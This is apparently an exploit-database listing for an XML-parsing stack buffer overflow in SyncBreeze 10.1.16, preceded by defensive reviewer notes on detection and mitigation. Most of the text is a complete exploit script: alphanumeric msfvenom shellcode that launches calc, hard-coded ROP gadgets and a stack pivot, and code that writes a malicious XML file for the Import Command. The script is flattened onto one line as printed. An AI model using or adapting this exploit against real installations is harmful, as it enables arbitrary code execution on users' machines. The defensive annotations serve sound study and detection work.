SyncBreeze 10.1.16 Buffer Overflow

2021.03.29
Risk: High
Local: No
Remote: Yes
CWE: CWE-119


Overall CVSS score: 6.8/10
Impact: 6.4/10
Exploitability: 8.6/10
Required access: Remote
Attack complexity: Medium
Authentication: Not required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

# Reviewer notes (defensive reading of this listing)
#
# Purpose: this script writes xplSyncBreeze.xml, an XML declaration followed
# by a single <sync name='...'> element whose name attribute carries the raw
# byte string `fruta`. According to the header below, importing that file via
# the application's Import Command triggers a stack-based overflow in the XML
# parser of SyncBreeze v10.1.16 x86 (CVE-2017-15950).
#
# Layout note: page extraction flattened the script. As shown, the first and
# last physical lines start with '#', and the middle line starts in the
# middle of a `shellcode +=` statement, so this text is not valid Python as
# printed.
#
# What the generated file looks like (from the constants in the script):
#   - the attribute value is 2324 bytes: 390*4 + 4 + 4*4 + 20*4 + 4 + 4 +
#     56*4 filler/address bytes plus the 432-byte payload;
#   - it opens with 1560 bytes of 0x41 ('A');
#   - the packed addresses 0x6506491c and 0x6506537C put the bytes 0x1c and
#     0x06 inside the attribute; neither is a legal XML 1.0 character, so a
#     conforming XML parser rejects the file outright;
#   - the tail is alphanumeric-only (x86/alpha_mixed per the msfvenom line).
# A content rule for imported command files can therefore key on an over-long
# `name` attribute on <sync>, a long run of one repeated byte, or control
# characters inside an attribute value.
#
# Payload: the msfvenom comment states windows/exec CMD=calc, i.e. the proof
# of success is a calculator process started by the application. On the
# endpoint, an unexpected child process of the SyncBreeze client is the
# behavioural signal to alert on.
#
# Hard-coded addresses: pivot, GAD1 and GAD2 are fixed 0x65xxxxxx values, so
# the chain depends on the module that holds them loading at the same base on
# every host. NOTE(review): presumably a module shipped without ASLR - confirm
# with the installed binaries. If so, an exploit-protection policy that forces
# image relocation for this process should invalidate those addresses; test it.
#
# Delivery: the Usage text describes a file that a user loads through Import
# Command, so the practical exposure is untrusted .xml command files reaching
# users of the application. NOTE(review): the Software Link below is a
# third-party file-sharing host, not the vendor site; do not treat an
# installer from it as a trusted artifact.
# Exploit Title: SyncBreeze 10.1.16 - XML Parsing Stack-based Buffer Overflow # Date: 03/27/2021 # Author: Filipe Oliveira - filipecenturiao[at]hotmail.com Rafael Machado - nnszs[at]protonmail.com # Vendor: https://www.syncbreeze.com/ # Software Link: https://www.4shared.com/file/57pE4sZfiq/syncbreeze_setup_v10116.html # Version: SyncBreeze v10.1.16 x86 # Tested on: Windows 10 x64 (19042.867) # CVE: CVE-2017-15950 Usage: The exploit will generate a POC file, called xplSyncBreeze.xml. Launch the application and click on Import Command, then load the POC file. # -*- coding: utf-8 -*- import struct # badchars #\x00\x0a\x0d\x20\x27 #\x81\x82\x83\x84\x85\x86\x87\x88 #\x89\x8A\x8B\x8C\x8D\x8E\x8F\x90 #\x91\x92\x93\x94\x95\x96\x97\x98 #\x99\x9A\x9B\x9C\x9D\x9E\x9F\xA0 #\xA1\xA2\xA3\xA4\xA5\xA6\xA7\xA8 #\xA9\xAA\xAB\xAC\xAD\xAE\xAF\xB0 #\xB1\xB2\xB3\xB4\xB5\xB6\xB7\xB8 #\xB9\xBA\xBB\xBC\xBD\xBE\xBF\xC0 #\xC1\xC2\xC3\xC4\xC5\xC6\xC7\xC8 #\xC9\xCA\xCB\xCC\xCD\xCE\xCF\xD0 #\xD1\xD2\xD3\xD4\xD5\xD6\xD7\xD8 #\xD9\xDA\xDB\xDC\xDD\xDE\xDF\xE0 #\xE1\xE2\xE3\xE4\xE5\xE6\xE7\xE8 #\xE9\xEA\xEB\xEC\xED\xEE\xEF\xF0 #\xF1\xF2\xF3\xF4\xF5\xF6\xF7\xF8 #\xF9\xFA\xFB\xFC\xFD\xFE\xFF # Shellcode payload size: 432 bytes # msfvenom -a x86 --platform windows -p windows/exec CMD=calc -e x86/alpha_mixed BufferRegister=EAX -b '\x00\x0A\x0D\x20\x27' -v shellcode -f python shellcode = b"" shellcode += b"\x50\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49" shellcode += b"\x49\x49\x49\x49\x49\x49\x49\x37\x51\x5a\x6a" shellcode += b"\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51" shellcode += b"\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42" shellcode += b"\x58\x50\x38\x41\x42\x75\x4a\x49\x6b\x4c\x69" shellcode += b"\x78\x4e\x62\x75\x50\x77\x70\x35\x50\x45\x30" shellcode += b"\x4b\x39\x59\x75\x55\x61\x39\x50\x52\x44\x4e" shellcode += b"\x6b\x42\x70\x50\x30\x6e\x6b\x42\x72\x54\x4c" shellcode += b"\x6c\x4b\x70\x52\x74\x54\x4c\x4b\x62\x52\x66" shellcode += b"\x48\x44\x4f\x48\x37\x61\x5a\x51\x36\x45\x61" shellcode += 
b"\x39\x6f\x6e\x4c\x75\x6c\x43\x51\x71\x6c\x65" shellcode += b"\x52\x56\x4c\x47\x50\x4b\x71\x38\x4f\x74\x4d" shellcode += b"\x37\x71\x49\x57\x38\x62\x7a\x52\x52\x72\x36" shellcode += b"\x37\x4c\x4b\x63\x62\x42\x30\x6c\x4b\x31\x5a" shellcode += b"\x57\x4c\x4c\x4b\x32\x6c\x36\x71\x31\x68\x4a" shellcode += b"\x43\x47\x38\x47\x71\x4a\x71\x76\x31\x6c\x4b" shellcode += b"\x36\x39\x67\x50\x66\x61\x58\x53\x4c\x4b\x70" shellcode += b"\x49\x66\x78\x59\x73\x34\x7a\x53\x79\x6e\x6b" shellcode += b"\x50\x34\x4c\x4b\x66\x61\x4e\x36\x55\x61\x39" shellcode += b"\x6f\x4c\x6c\x4a\x61\x4a\x6f\x34\x4d\x67\x71" shellcode += b"\x48\x47\x67\x48\x69\x70\x71\x65\x59\x66\x54" shellcode += b"\x43\x63\x4d\x79\x68\x75\x6b\x73\x4d\x67\x54" shellcode += b"\x44\x35\x79\x74\x72\x78\x4e\x6b\x53\x68\x71" shellcode += b"\x34\x57\x71\x5a\x73\x52\x46\x6c\x4b\x36\x6c" shellcode += b"\x72\x6b\x6c\x4b\x76\x38\x75\x4c\x67\x71\x68" shellcode += b"\x53\x6e\x6b\x57\x74\x4e\x6b\x63\x31\x78\x50" shellcode += b"\x6f\x79\x73\x74\x47\x54\x64\x64\x53\x6b\x31" shellcode += b"\x4b\x63\x51\x50\x59\x63\x6a\x43\x61\x39\x6f" shellcode += b"\x59\x70\x73\x6f\x31\x4f\x62\x7a\x4e\x6b\x44" shellcode += b"\x52\x6a\x4b\x4e\x6d\x53\x6d\x73\x5a\x63\x31" shellcode += b"\x4c\x4d\x4d\x55\x6f\x42\x75\x50\x47\x70\x33" shellcode += b"\x30\x46\x30\x50\x68\x74\x71\x6c\x4b\x42\x4f" shellcode += b"\x6e\x67\x39\x6f\x6e\x35\x6f\x4b\x58\x70\x78" shellcode += b"\x35\x79\x32\x46\x36\x33\x58\x79\x36\x4c\x55" shellcode += b"\x4f\x4d\x6d\x4d\x39\x6f\x6a\x75\x55\x6c\x63" shellcode += b"\x36\x61\x6c\x45\x5a\x6d\x50\x49\x6b\x39\x70" shellcode += b"\x32\x55\x75\x55\x6d\x6b\x57\x37\x64\x53\x74" shellcode += b"\x32\x52\x4f\x50\x6a\x53\x30\x61\x43\x59\x6f" shellcode += b"\x78\x55\x73\x53\x30\x61\x30\x6c\x72\x43\x43" shellcode += b"\x30\x41\x41" # padding to crash buffer basura = struct.pack('<L', 0x41414141) * 390 # gadgets to move payload pointer into EAX GAD1 = struct.pack('<L', 0x65235465) # XCHG EAX,EBP GAD2 = struct.pack('<L', 0x6506537C) # CALL EAX 
# padding to reach buffer address stored in ebp basura2 = struct.pack('<L', 0x41414141) * 56 # padding for stack pivot padding = struct.pack('<L', 0x41414141) * 4 padding2 = struct.pack('<L', 0x41414141) * 20 # stack pivot to reach an area with more space for gadgets on the stack # 0x6506491c: add esp, 0x48 ; pop edi ; pop esi ; ret pivot = struct.pack('<L', 0x6506491c) # final payload fruta = basura + pivot + padding + padding2 + GAD1 + GAD2 + basura2 + shellcode # write payload to xml file payload = open("xplSyncBreeze.xml", "wb") payload.write("<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n\n".encode('utf-8')) payload.write("<sync name='".encode('utf-8')) payload.write(fruta) payload.write("'>\n</sync>\n".encode('utf-8')) payload.close()

